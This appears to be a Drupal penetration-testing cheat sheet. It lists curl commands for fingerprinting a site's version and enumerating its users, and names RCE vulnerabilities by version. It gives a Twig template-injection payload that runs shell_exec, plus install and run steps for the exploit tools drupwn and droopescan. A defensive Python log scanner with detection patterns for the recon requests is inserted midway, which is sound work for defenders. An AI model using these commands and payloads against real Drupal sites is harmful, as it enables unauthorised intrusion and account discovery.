```bash
# check meta generator tag
curl https://www.drupal.org/ | grep 'content="Drupal'
# version
curl https://drupal-site.com/CHANGELOG.txt
# node
curl drupal-site.com/node/1
# users
# 403 -> exists | 404 -> doesn't
curl https://www.drupal.org/user/X
# get username
curl https://www.drupal.org/reset/user/X/1/1
```
Drupal < 8.7.x Authenticated RCE module upload
Drupal < 9.1.x Authenticated RCE Twig templates (template body):

```twig
{{ {"#lazy_builder": ["shell_exec", ["touch /tmp/hellofromviews"]]} }}
```
If `/node/$NUMBER` exists, the number may point to developer or test pages.
Drupal < 8.6.9 - REST Module Remote Code Execution
Check for username disclosure on old versions:

`?q=admin/views/ajax/autocomplete/user/a`
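From the defender's side, the fingerprinting and user-enumeration requests listed above leave a recognisable trail in web server access logs. The following is an added example, not part of the original cheat sheet: it scans Combined Log Format lines for `/CHANGELOG.txt` fetches, the `admin/views/ajax/autocomplete/user/` disclosure path, password-reset username probes, and bursts of `/user/N` requests answered with 403/404. The log lines, IPs and the probe threshold are constructed for the example.

```python
import re
from collections import defaultdict

# Combined Log Format: client IP, method, path, status (constructed regex)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Paths the cheat sheet uses for fingerprinting and user enumeration
CHANGELOG = re.compile(r'^/CHANGELOG\.txt$', re.I)
USER_PROBE = re.compile(r'^/user/(\d+)/?$')
# both spellings: the one quoted above and Drupal's own /user/reset/{uid}/{ts}/{hash} route
RESET_PROBE = re.compile(r'^/(?:user/)?reset/(?:user/)?\d+/\d+/\d+')
AUTOCOMPLETE = re.compile(r'q=admin/views/ajax/autocomplete/user/', re.I)

def detect_drupal_recon(lines, probe_threshold=5):
    """Return {client_ip: sorted findings} for clients matching the recon patterns.
    A client counts as enumerating users once it has probed >= probe_threshold
    distinct /user/N ids that came back 403 or 404 (the exists/doesn't-exist oracle)."""
    findings = defaultdict(set)
    user_ids = defaultdict(set)  # distinct /user/N ids probed per client
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, path, status = m['ip'], m['path'], m['status']
        if CHANGELOG.search(path):
            findings[ip].add('changelog_version_disclosure')
        if AUTOCOMPLETE.search(path):
            findings[ip].add('user_autocomplete_disclosure')
        if RESET_PROBE.search(path):
            findings[ip].add('password_reset_username_probe')
        um = USER_PROBE.match(path.split('?', 1)[0])
        if um and status in ('403', '404'):
            user_ids[ip].add(um.group(1))
    for ip, ids in user_ids.items():
        if len(ids) >= probe_threshold:
            findings[ip].add(f'user_id_enumeration:{len(ids)}')
    return {ip: sorted(f) for ip, f in findings.items()}

# Constructed sample log: one client running the recon sequence, one normal visitor
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /CHANGELOG.txt HTTP/1.1" 200 1024',
    *[f'203.0.113.7 - - [10/Oct/2023:13:55:{40 + i} +0000] "GET /user/{i} HTTP/1.1" '
      f'{"403" if i % 2 else "404"} 512' for i in range(1, 7)],
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1" 200 200',
    '198.51.100.2 - - [10/Oct/2023:13:57:00 +0000] "GET /user/42 HTTP/1.1" 200 3000',
    '198.51.100.2 - - [10/Oct/2023:13:57:05 +0000] "GET /node/1 HTTP/1.1" 200 3000',
]

if __name__ == '__main__':
    for client, hits in detect_drupal_recon(SAMPLE_LOG).items():
        print(client, hits)
```

Tune `probe_threshold` to the site's normal traffic; a logged-in user viewing their own `/user/N` page returns 200 and is not counted.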
Enumeration & Exploitation
```bash
# install drupwn
git clone https://github.com/immunIT/drupwn.git
cd drupwn
pip3 install -r requirements.txt
# enum
drupwn --mode enum --target $url
# exploit
drupwn --mode exploit --target $url
```

```bash
# install droopescan
apt-get install python-pip
pip install droopescan
# scan
droopescan scan drupal -u example.org
```